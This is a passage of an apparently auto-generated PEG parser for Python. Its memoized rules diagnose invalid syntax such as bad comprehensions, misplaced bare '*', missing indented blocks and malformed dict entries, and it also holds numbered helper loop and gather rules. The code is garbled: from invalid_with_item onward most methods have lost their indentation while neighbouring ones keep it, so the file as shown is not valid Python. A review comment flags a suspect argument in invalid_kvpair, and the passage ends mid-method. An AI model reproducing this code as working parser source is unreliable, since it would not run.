            (a := self.star_expressions())
        ):
            return self . raise_syntax_error_known_location ( f"cannot delete {self.get_expr_name(a)}" , a )
        self._reset(mark)
        return None
    @memoize
    def invalid_block(self) -> Optional[NoReturn]:
        # invalid_block: NEWLINE !INDENT
        """Diagnose a compound-statement header not followed by an indent.

        Raises an ``IndentationError`` ("expected an indented block").
        """
        mark = self._mark()
        if (
            (_newline := self.expect('NEWLINE'))
            and
            self.negative_lookahead(self.expect, 'INDENT')
        ):
            return self . raise_indentation_error ( "expected an indented block" )
        self._reset(mark)
        return None
    @memoize
    def invalid_comprehension(self) -> Optional[NoReturn]:
        # invalid_comprehension: ('[' | '(' | '{') starred_expression for_if_clauses | ('[' | '{') star_named_expression ',' star_named_expressions for_if_clauses | ('[' | '{') star_named_expression ',' for_if_clauses
        """Diagnose illegal comprehension bodies.

        Catches iterable unpacking (``*x``) as a comprehension element and
        an unparenthesized tuple as the comprehension target; raises a
        targeted syntax error.
        """
        mark = self._mark()
        if (
            (_tmp_171 := self._tmp_171())
            and
            (a := self.starred_expression())
            and
            (for_if_clauses := self.for_if_clauses())
        ):
            return self . raise_syntax_error_known_location ( "iterable unpacking cannot be used in comprehension" , a )
        self._reset(mark)
        if (
            (_tmp_172 := self._tmp_172())
            and
            (a := self.star_named_expression())
            and
            (literal := self.expect(','))
            and
            (b := self.star_named_expressions())
            and
            (for_if_clauses := self.for_if_clauses())
        ):
            return self . raise_syntax_error_known_range ( "did you forget parentheses around the comprehension target?" , a , b [- 1] )
        self._reset(mark)
        if (
            (_tmp_173 := self._tmp_173())
            and
            (a := self.star_named_expression())
            and
            (b := self.expect(','))
            and
            (for_if_clauses := self.for_if_clauses())
        ):
            return self . raise_syntax_error_known_range ( "did you forget parentheses around the comprehension target?" , a , b )
        self._reset(mark)
        return None
    @memoize
    def invalid_dict_comprehension(self) -> Optional[NoReturn]:
        # invalid_dict_comprehension: '{' '**' bitwise_or for_if_clauses '}'
        """Diagnose ``**`` unpacking inside a dict comprehension.

        Raises with the location of the ``**`` token.
        """
        mark = self._mark()
        if (
            (literal := self.expect('{'))
            and
            (a := self.expect('**'))
            and
            (bitwise_or := self.bitwise_or())
            and
            (for_if_clauses := self.for_if_clauses())
            and
            (literal_1 := self.expect('}'))
        ):
            return self . raise_syntax_error_known_location ( "dict unpacking cannot be used in dict comprehension" , a )
        self._reset(mark)
        return None
    @memoize
    def invalid_parameters(self) -> Optional[NoReturn]:
        # invalid_parameters: param_no_default* invalid_parameters_helper param_no_default
        """Diagnose a non-default parameter after a defaulted one.

        Raises at the offending non-default parameter's location.
        """
        mark = self._mark()
        if (
            (_loop0_174 := self._loop0_174(),)
            and
            (invalid_parameters_helper := self.invalid_parameters_helper())
            and
            (a := self.param_no_default())
        ):
            return self . raise_syntax_error_known_location ( "non-default argument follows default argument" , a )
        self._reset(mark)
        return None
    @memoize
    def invalid_parameters_helper(self) -> Optional[Any]:
        # invalid_parameters_helper: slash_with_default | param_with_default+
        """Match the defaulted-parameter prefix for ``invalid_parameters``.

        Returns a (possibly singleton) list of defaulted parameters, or
        ``None``.
        """
        mark = self._mark()
        if (
            (a := self.slash_with_default())
        ):
            return [a]
        self._reset(mark)
        if (
            (a := self._loop1_175())
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def invalid_lambda_parameters(self) -> Optional[NoReturn]:
        # invalid_lambda_parameters: lambda_param_no_default* invalid_lambda_parameters_helper lambda_param_no_default
        """Diagnose a non-default lambda parameter after a defaulted one.

        Lambda counterpart of ``invalid_parameters``; raises at the
        offending parameter's location.
        """
        mark = self._mark()
        if (
            (_loop0_176 := self._loop0_176(),)
            and
            (invalid_lambda_parameters_helper := self.invalid_lambda_parameters_helper())
            and
            (a := self.lambda_param_no_default())
        ):
            return self . raise_syntax_error_known_location ( "non-default argument follows default argument" , a )
        self._reset(mark)
        return None
    @memoize
    def invalid_lambda_parameters_helper(self) -> Optional[NoReturn]:
        # invalid_lambda_parameters_helper: lambda_slash_with_default | lambda_param_with_default+
        """Match the defaulted-parameter prefix for ``invalid_lambda_parameters``.

        Returns a (possibly singleton) list of defaulted lambda parameters,
        or ``None``.
        """
        mark = self._mark()
        if (
            (a := self.lambda_slash_with_default())
        ):
            return [a]
        self._reset(mark)
        if (
            (a := self._loop1_177())
        ):
            return a
        self._reset(mark)
        return None
    @memoize
    def invalid_star_etc(self) -> Optional[NoReturn]:
        # invalid_star_etc: '*' (')' | ',' (')' | '**')) | '*' ',' TYPE_COMMENT
        """Diagnose a bare ``*`` with no following named parameters.

        Also rejects a type comment attached to a bare ``*``; stores a
        syntax error in both cases.
        """
        mark = self._mark()
        if (
            (a := self.expect('*'))
            and
            (_tmp_178 := self._tmp_178())
        ):
            return self . store_syntax_error_known_location ( "named arguments must follow bare *" , a )
        self._reset(mark)
        if (
            (literal := self.expect('*'))
            and
            (literal_1 := self.expect(','))
            and
            (type_comment := self.type_comment())
        ):
            return self . store_syntax_error ( "bare * has associated type comment" )
        self._reset(mark)
        return None
    @memoize
    def invalid_lambda_star_etc(self) -> Optional[NoReturn]:
        # invalid_lambda_star_etc: '*' (':' | ',' (':' | '**'))
        """Diagnose a bare ``*`` in a lambda parameter list.

        Lambda counterpart of ``invalid_star_etc``; raises immediately.
        """
        mark = self._mark()
        if (
            (literal := self.expect('*'))
            and
            (_tmp_179 := self._tmp_179())
        ):
            return self . raise_syntax_error ( "named arguments must follow bare *" )
        self._reset(mark)
        return None
    @memoize
    def invalid_double_type_comments(self) -> Optional[NoReturn]:
        # invalid_double_type_comments: TYPE_COMMENT NEWLINE TYPE_COMMENT NEWLINE INDENT
        """Diagnose two consecutive type comments on a ``def`` header.

        Raises a syntax error; only one signature type comment is allowed.
        """
        mark = self._mark()
        if (
            (type_comment := self.type_comment())
            and
            (_newline := self.expect('NEWLINE'))
            and
            (type_comment_1 := self.type_comment())
            and
            (_newline_1 := self.expect('NEWLINE'))
            and
            (_indent := self.expect('INDENT'))
        ):
            return self . raise_syntax_error ( "Cannot have two type comments on def" )
        self._reset(mark)
        return None
@memoize
def invalid_with_item(self) -> Optional[NoReturn]:
# invalid_with_item: expression 'as' expression &(',' | ')' | ':')
mark = self._mark()
if (
(expression := self.expression())
and
(literal := self.expect('as'))
and
(a := self.expression())
and
self.positive_lookahead(self._tmp_180, )
):
return self . raise_syntax_error_known_location ( f"cannot assign to {self.get_expr_name(a)}" , a )
self._reset(mark)
return None
@memoize
def invalid_for_target(self) -> Optional[NoReturn]:
# invalid_for_target: 'async'? 'for' star_expressions
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(literal := self.expect('for'))
and
(a := self.star_expressions())
):
return self . raise_syntax_error_known_location ( f"cannot assign to {self.get_expr_name(a)}" , a )
self._reset(mark)
return None
@memoize
def invalid_group(self) -> Optional[NoReturn]:
# invalid_group: '(' starred_expression ')' | '(' '**' expression ')'
mark = self._mark()
if (
(literal := self.expect('('))
and
(a := self.starred_expression())
and
(literal_1 := self.expect(')'))
):
return self . raise_syntax_error_known_location ( "cannot use starred expression here" , a )
self._reset(mark)
if (
(literal := self.expect('('))
and
(a := self.expect('**'))
and
(expression := self.expression())
and
(literal_1 := self.expect(')'))
):
return self . raise_syntax_error_known_location ( "cannot use double starred expression here" , a )
self._reset(mark)
return None
@memoize
def invalid_import_from_targets(self) -> Optional[NoReturn]:
# invalid_import_from_targets: import_from_as_names ',' NEWLINE
mark = self._mark()
if (
(import_from_as_names := self.import_from_as_names())
and
(literal := self.expect(','))
and
(_newline := self.expect('NEWLINE'))
):
return self . raise_syntax_error ( "trailing comma not allowed without surrounding parentheses" )
self._reset(mark)
return None
@memoize
def invalid_with_stmt(self) -> Optional[None]:
# invalid_with_stmt: 'async'? 'with' ','.(expression ['as' star_target])+ &&':' | 'async'? 'with' '(' ','.(expressions ['as' star_target])+ ','? ')' &&':'
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(literal := self.expect('with'))
and
(_gather_181 := self._gather_181())
and
(forced := self.expect_forced(self.expect(':'), "':'"))
):
return None # pragma: no cover
self._reset(mark)
if (
(opt := self.expect('async'),)
and
(literal := self.expect('with'))
and
(literal_1 := self.expect('('))
and
(_gather_183 := self._gather_183())
and
(opt_1 := self.expect(','),)
and
(literal_2 := self.expect(')'))
and
(forced := self.expect_forced(self.expect(':'), "':'"))
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def invalid_with_stmt_indent(self) -> Optional[NoReturn]:
# invalid_with_stmt_indent: 'async'? 'with' ','.(expression ['as' star_target])+ ':' NEWLINE !INDENT | 'async'? 'with' '(' ','.(expressions ['as' star_target])+ ','? ')' ':' NEWLINE !INDENT
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(a := self.expect('with'))
and
(_gather_185 := self._gather_185())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'with' statement on line {a.start[0]}" )
self._reset(mark)
if (
(opt := self.expect('async'),)
and
(a := self.expect('with'))
and
(literal := self.expect('('))
and
(_gather_187 := self._gather_187())
and
(opt_1 := self.expect(','),)
and
(literal_1 := self.expect(')'))
and
(literal_2 := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'with' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_try_stmt(self) -> Optional[NoReturn]:
# invalid_try_stmt: 'try' ':' NEWLINE !INDENT | 'try' ':' block !('except' | 'finally')
mark = self._mark()
if (
(a := self.expect('try'))
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'try' statement on line {a.start[0]}" , )
self._reset(mark)
if (
(literal := self.expect('try'))
and
(literal_1 := self.expect(':'))
and
(block := self.block())
and
self.negative_lookahead(self._tmp_189, )
):
return self . raise_syntax_error ( "expected 'except' or 'finally' block" )
self._reset(mark)
return None
@memoize
def invalid_except_stmt(self) -> Optional[None]:
# invalid_except_stmt: 'except' expression ',' expressions ['as' NAME] ':' | 'except' expression ['as' NAME] NEWLINE | 'except' NEWLINE
mark = self._mark()
if (
(literal := self.expect('except'))
and
(a := self.expression())
and
(literal_1 := self.expect(','))
and
(expressions := self.expressions())
and
(opt := self._tmp_190(),)
and
(literal_2 := self.expect(':'))
):
return self . raise_syntax_error_starting_from ( "exception group must be parenthesized" , a )
self._reset(mark)
if (
(a := self.expect('except'))
and
(expression := self.expression())
and
(opt := self._tmp_191(),)
and
(_newline := self.expect('NEWLINE'))
):
return self . store_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect('except'))
and
(_newline := self.expect('NEWLINE'))
):
return self . store_syntax_error ( "expected ':'" )
self._reset(mark)
return None
@memoize
def invalid_finally_stmt(self) -> Optional[NoReturn]:
# invalid_finally_stmt: 'finally' ':' NEWLINE !INDENT
mark = self._mark()
if (
(a := self.expect('finally'))
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'finally' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_except_stmt_indent(self) -> Optional[NoReturn]:
# invalid_except_stmt_indent: 'except' expression ['as' NAME] ':' NEWLINE !INDENT | 'except' ':' NEWLINE !INDENT
mark = self._mark()
if (
(a := self.expect('except'))
and
(expression := self.expression())
and
(opt := self._tmp_192(),)
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'except' statement on line {a.start[0]}" )
self._reset(mark)
if (
(a := self.expect('except'))
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'except' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_match_stmt(self) -> Optional[NoReturn]:
# invalid_match_stmt: "match" subject_expr !':' | "match" subject_expr ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect("match"))
and
(subject_expr := self.subject_expr())
and
self.negative_lookahead(self.expect, ':')
):
return self . check_version ( ( 3 , 10 ) , "Pattern matching is" , self . raise_syntax_error ( "expected ':'" ) )
self._reset(mark)
if (
(a := self.expect("match"))
and
(subject := self.subject_expr())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . check_version ( ( 3 , 10 ) , "Pattern matching is" , self . raise_indentation_error ( f"expected an indented block after 'match' statement on line {a.start[0]}" ) )
self._reset(mark)
return None
@memoize
def invalid_case_block(self) -> Optional[NoReturn]:
# invalid_case_block: "case" patterns guard? !':' | "case" patterns guard? ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect("case"))
and
(patterns := self.patterns())
and
(opt := self.guard(),)
and
self.negative_lookahead(self.expect, ':')
):
return self . store_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect("case"))
and
(patterns := self.patterns())
and
(opt := self.guard(),)
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'case' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_as_pattern(self) -> Optional[NoReturn]:
# invalid_as_pattern: or_pattern 'as' "_" | or_pattern 'as' !NAME expression
mark = self._mark()
if (
(or_pattern := self.or_pattern())
and
(literal := self.expect('as'))
and
(a := self.expect("_"))
):
return self . raise_syntax_error_known_location ( "cannot use '_' as a target" , a )
self._reset(mark)
if (
(or_pattern := self.or_pattern())
and
(literal := self.expect('as'))
and
self.negative_lookahead(self.name, )
and
(a := self.expression())
):
return self . raise_syntax_error_known_location ( "invalid pattern target" , a )
self._reset(mark)
return None
@memoize
def invalid_class_pattern(self) -> Optional[NoReturn]:
# invalid_class_pattern: name_or_attr '(' invalid_class_argument_pattern
mark = self._mark()
if (
(name_or_attr := self.name_or_attr())
and
(literal := self.expect('('))
and
(a := self.invalid_class_argument_pattern())
):
return self . raise_syntax_error_known_range ( "positional patterns follow keyword patterns" , a [0] , a [- 1] )
self._reset(mark)
return None
@memoize
def invalid_class_argument_pattern(self) -> Optional[list]:
# invalid_class_argument_pattern: [positional_patterns ','] keyword_patterns ',' positional_patterns
mark = self._mark()
if (
(opt := self._tmp_193(),)
and
(keyword_patterns := self.keyword_patterns())
and
(literal := self.expect(','))
and
(a := self.positional_patterns())
):
return a
self._reset(mark)
return None
@memoize
def invalid_if_stmt(self) -> Optional[NoReturn]:
# invalid_if_stmt: 'if' named_expression NEWLINE | 'if' named_expression ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect('if'))
and
(named_expression := self.named_expression())
and
(_newline := self.expect('NEWLINE'))
):
return self . raise_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect('if'))
and
(a_1 := self.named_expression())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'if' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_elif_stmt(self) -> Optional[NoReturn]:
# invalid_elif_stmt: 'elif' named_expression NEWLINE | 'elif' named_expression ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect('elif'))
and
(named_expression := self.named_expression())
and
(_newline := self.expect('NEWLINE'))
):
return self . raise_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect('elif'))
and
(named_expression := self.named_expression())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'elif' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_else_stmt(self) -> Optional[NoReturn]:
# invalid_else_stmt: 'else' ':' NEWLINE !INDENT
mark = self._mark()
if (
(a := self.expect('else'))
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'else' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_while_stmt(self) -> Optional[NoReturn]:
# invalid_while_stmt: 'while' named_expression NEWLINE | 'while' named_expression ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect('while'))
and
(named_expression := self.named_expression())
and
(_newline := self.expect('NEWLINE'))
):
return self . store_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect('while'))
and
(named_expression := self.named_expression())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'while' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_for_stmt(self) -> Optional[NoReturn]:
# invalid_for_stmt: 'async'? 'for' star_targets 'in' star_expressions ':' NEWLINE !INDENT
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(a := self.expect('for'))
and
(star_targets := self.star_targets())
and
(literal := self.expect('in'))
and
(star_expressions := self.star_expressions())
and
(literal_1 := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'for' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_def_raw(self) -> Optional[NoReturn]:
# invalid_def_raw: 'async'? 'def' NAME '(' params? ')' ['->' expression] ':' NEWLINE !INDENT
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(a := self.expect('def'))
and
(name := self.name())
and
(literal := self.expect('('))
and
(opt_1 := self.params(),)
and
(literal_1 := self.expect(')'))
and
(opt_2 := self._tmp_194(),)
and
(literal_2 := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after function definition on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_class_def_raw(self) -> Optional[NoReturn]:
# invalid_class_def_raw: 'class' NAME ['(' arguments? ')'] ':' NEWLINE !INDENT
mark = self._mark()
if (
(a := self.expect('class'))
and
(name := self.name())
and
(opt := self._tmp_195(),)
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after class definition on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_double_starred_kvpairs(self) -> Optional[None]:
# invalid_double_starred_kvpairs: ','.double_starred_kvpair+ ',' invalid_kvpair | expression ':' '*' bitwise_or | expression ':' &('}' | ',')
mark = self._mark()
if (
(_gather_196 := self._gather_196())
and
(literal := self.expect(','))
and
(invalid_kvpair := self.invalid_kvpair())
):
return None # pragma: no cover
self._reset(mark)
if (
(expression := self.expression())
and
(literal := self.expect(':'))
and
(a := self.expect('*'))
and
(bitwise_or := self.bitwise_or())
):
return self . store_syntax_error_starting_from ( "cannot use a starred expression in a dictionary value" , a )
self._reset(mark)
if (
(expression := self.expression())
and
(a := self.expect(':'))
and
self.positive_lookahead(self._tmp_198, )
):
return self . store_syntax_error_known_location ( "expression expected after dictionary key and ':'" , a )
self._reset(mark)
return None
    @memoize
    def invalid_kvpair(self) -> Optional[None]:
        # invalid_kvpair: expression !(':') | expression ':' '*' bitwise_or | expression ':'
        # A dict entry that is missing its ':', uses a starred value, or has
        # no value expression after the ':'.
        mark = self._mark()
        if (
            (a := self.expression())
            and
            self.negative_lookahead(self.expect, ':')
        ):
            # NOTE(review): the end-location argument is a 3-tuple
            # (end_lineno, end_col_offset, -1); the start argument is the
            # 2-tuple (lineno, col_offset - 1). The trailing ", - 1" looks
            # like it was meant to be "end_col_offset - 1" — confirm against
            # the grammar action and _store_syntax_error's expected signature.
            return self . _store_syntax_error ( "':' expected after dictionary key" , ( a . lineno , a . col_offset - 1 ) , ( a . end_lineno , a . end_col_offset , - 1 ) )
        self._reset(mark)
        if (
            (expression := self.expression())
            and
            (literal := self.expect(':'))
            and
            (a := self.expect('*'))
            and
            (bitwise_or := self.bitwise_or())
        ):
            return self . store_syntax_error_starting_from ( "cannot use a starred expression in a dictionary value" , a )
        self._reset(mark)
        if (
            (expression := self.expression())
            and
            (a := self.expect(':'))
        ):
            return self . store_syntax_error_known_location ( "expression expected after dictionary key and ':'" , a )
        self._reset(mark)
        return None
@memoize
def _loop0_1(self) -> Optional[Any]:
# _loop0_1: NEWLINE
mark = self._mark()
children = []
while (
(_newline := self.expect('NEWLINE'))
):
children.append(_newline)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_2(self) -> Optional[Any]:
# _loop0_2: NEWLINE
mark = self._mark()
children = []
while (
(_newline := self.expect('NEWLINE'))
):
children.append(_newline)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_3(self) -> Optional[Any]:
# _loop1_3: statement
mark = self._mark()
children = []
while (
(statement := self.statement())
):
children.append(statement)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_5(self) -> Optional[Any]:
# _loop0_5: ';' simple_stmt
mark = self._mark()
children = []
while (
(literal := self.expect(';'))
and
(elem := self.simple_stmt())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_4(self) -> Optional[Any]:
# _gather_4: simple_stmt _loop0_5
mark = self._mark()
if (
(elem := self.simple_stmt())
is not None
and
(seq := self._loop0_5())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_6(self) -> Optional[Any]:
# _tmp_6: 'import' | 'from'
mark = self._mark()
if (
(literal := self.expect('import'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('from'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_7(self) -> Optional[Any]:
# _tmp_7: 'def' | '@' | 'async'
mark = self._mark()
if (
(literal := self.expect('def'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('@'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('async'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_8(self) -> Optional[Any]:
# _tmp_8: 'class' | '@'
mark = self._mark()
if (
(literal := self.expect('class'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('@'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_9(self) -> Optional[Any]:
# _tmp_9: 'with' | 'async'
mark = self._mark()
if (
(literal := self.expect('with'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('async'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_10(self) -> Optional[Any]:
# _tmp_10: 'for' | 'async'
mark = self._mark()
if (
(literal := self.expect('for'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('async'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_11(self) -> Optional[Any]:
# _tmp_11: '=' annotated_rhs
mark = self._mark()
if (
(literal := self.expect('='))
and
(d := self.annotated_rhs())
):
return d
self._reset(mark)
return None
@memoize
def _tmp_12(self) -> Optional[Any]:
# _tmp_12: '(' single_target ')' | single_subscript_attribute_target
mark = self._mark()
if (
(literal := self.expect('('))
and
(b := self.single_target())
and
(literal_1 := self.expect(')'))
):
return b
self._reset(mark)
if (
(single_subscript_attribute_target := self.single_subscript_attribute_target())
):
return single_subscript_attribute_target
self._reset(mark)
return None
@memoize
def _tmp_13(self) -> Optional[Any]:
# _tmp_13: '=' annotated_rhs
mark = self._mark()
if (
(literal := self.expect('='))
and
(d := self.annotated_rhs())
):
return d
self._reset(mark)
return None
@memoize
def _loop0_15(self) -> Optional[Any]:
# _loop0_15: ',' NAME
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_14(self) -> Optional[Any]:
# _gather_14: NAME _loop0_15
mark = self._mark()
if (
(elem := self.name())
is not None
and
(seq := self._loop0_15())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_16(self) -> Optional[Any]:
# _loop1_16: (star_targets '=')
mark = self._mark()
children = []
while (
(_tmp_199 := self._tmp_199())
):
children.append(_tmp_199)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_17(self) -> Optional[Any]:
# _tmp_17: yield_expr | star_expressions
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def _tmp_18(self) -> Optional[Any]:
# _tmp_18: yield_expr | star_expressions
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def _tmp_19(self) -> Optional[Any]:
# _tmp_19: 'from' expression
mark = self._mark()
if (
(literal := self.expect('from'))
and
(z := self.expression())
):
return z
self._reset(mark)
return None
@memoize
def _loop0_21(self) -> Optional[Any]:
# _loop0_21: ',' NAME
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_20(self) -> Optional[Any]:
# _gather_20: NAME _loop0_21
mark = self._mark()
if (
(elem := self.name())
is not None
and
(seq := self._loop0_21())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_23(self) -> Optional[Any]:
# _loop0_23: ',' NAME
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_22(self) -> Optional[Any]:
# _gather_22: NAME _loop0_23
mark = self._mark()
if (
(elem := self.name())
is not None
and
(seq := self._loop0_23())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_24(self) -> Optional[Any]:
# _tmp_24: ';' | NEWLINE
mark = self._mark()
if (
(literal := self.expect(';'))
):
return literal
self._reset(mark)
if (
(_newline := self.expect('NEWLINE'))
):
return _newline
self._reset(mark)
return None
@memoize
def _tmp_25(self) -> Optional[Any]:
# _tmp_25: ',' expression
mark = self._mark()
if (
(literal := self.expect(','))
and
(z := self.expression())
):
return z
self._reset(mark)
return None
@memoize
def _loop0_26(self) -> Optional[Any]:
# _loop0_26: ('.' | '...')
mark = self._mark()
children = []
while (
(_tmp_200 := self._tmp_200())
):
children.append(_tmp_200)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_27(self) -> Optional[Any]:
# _loop1_27: ('.' | '...')
mark = self._mark()
children = []
while (
(_tmp_201 := self._tmp_201())
):
children.append(_tmp_201)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_29(self) -> Optional[Any]:
# _loop0_29: ',' import_from_as_name
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.import_from_as_name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_28(self) -> Optional[Any]:
# _gather_28: import_from_as_name _loop0_29
mark = self._mark()
if (
(elem := self.import_from_as_name())
is not None
and
(seq := self._loop0_29())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_30(self) -> Optional[Any]:
# _tmp_30: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(z := self.name())
):
return z . string
self._reset(mark)
return None
@memoize
def _loop0_32(self) -> Optional[Any]:
# _loop0_32: ',' dotted_as_name
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.dotted_as_name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_31(self) -> Optional[Any]:
# _gather_31: dotted_as_name _loop0_32
mark = self._mark()
if (
(elem := self.dotted_as_name())
is not None
and
(seq := self._loop0_32())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_33(self) -> Optional[Any]:
# _tmp_33: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(z := self.name())
):
return z . string
self._reset(mark)
return None
@memoize
def _loop1_34(self) -> Optional[Any]:
# _loop1_34: decorator
mark = self._mark()
children = []
while (
(decorator := self.decorator())
):
children.append(decorator)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_35(self) -> Optional[Any]:
# _tmp_35: '@' dec_maybe_call NEWLINE
mark = self._mark()
if (
(literal := self.expect('@'))
and
(f := self.dec_maybe_call())
and
(_newline := self.expect('NEWLINE'))
):
return f
self._reset(mark)
return None
@memoize
def _tmp_36(self) -> Optional[Any]:
# _tmp_36: '@' named_expression NEWLINE
mark = self._mark()
if (
(literal := self.expect('@'))
and
(f := self.named_expression())
and
(_newline := self.expect('NEWLINE'))
):
return f
self._reset(mark)
return None
@memoize
def _tmp_37(self) -> Optional[Any]:
# _tmp_37: '(' arguments? ')'
mark = self._mark()
if (
(literal := self.expect('('))
and
(z := self.arguments(),)
and
(literal_1 := self.expect(')'))
):
return z
self._reset(mark)
return None
@memoize
def _tmp_38(self) -> Optional[Any]:
# _tmp_38: '->' expression
mark = self._mark()
if (
(literal := self.expect('->'))
and
(z := self.expression())
):
return z
self._reset(mark)
return None
@memoize
def _tmp_39(self) -> Optional[Any]:
# _tmp_39: '->' expression
mark = self._mark()
if (
(literal := self.expect('->'))
and
(z := self.expression())
):
return z
self._reset(mark)
return None
@memoize
def _loop0_40(self) -> Optional[Any]:
# _loop0_40: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
